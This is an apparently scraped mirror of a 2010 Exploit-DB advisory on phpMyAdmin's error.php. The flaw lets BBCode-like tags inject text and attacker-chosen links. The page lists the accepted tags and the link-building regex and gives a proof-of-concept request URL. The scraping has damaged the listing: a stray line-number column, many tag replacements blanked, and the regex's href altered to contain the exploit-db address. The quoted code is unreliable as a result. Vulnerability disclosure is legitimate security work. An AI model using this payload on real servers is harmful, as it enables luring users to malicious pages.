phpMyAdmin – Client-Side Code Injection / Redirect Link Falsification - 体验盒子

作者： emgent white_sheep & scox

日期： 2010-12-06

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15699/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:

Emanuele 'emgent' Gentili <emgent@backtrack-linux.org>

Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>

Alessandro 'scox' Scoscia <scox@backtrack.it>

In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.

With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.

Available tags are:

'[i]' => '',

'[/i]'=> '',

'[em]'=> '',

'[/em]' => '',

'[b]' => '',

'[/b]'=> '',

'[strong]'=> '',

'[/strong]' => '',

'[tt]'=> '<code>',

'[/tt]' => '</code>',

'[code]'=> '<code>',

'[/code]' => '</code>',

'[kbd]' => '<kbd>',

'[/kbd]'=> '</kbd>',

'[br]'=> ' ',

'[/a]'=> '</a>',

'[sup]'=> '',

'[/sup]'=> '',

and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="https://www.exploit-db.com/exploits/15699/\1" target="\2">'

POC:

http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]

OWASP Reference:

http://www.owasp.org/index.php/Unvalidated_Input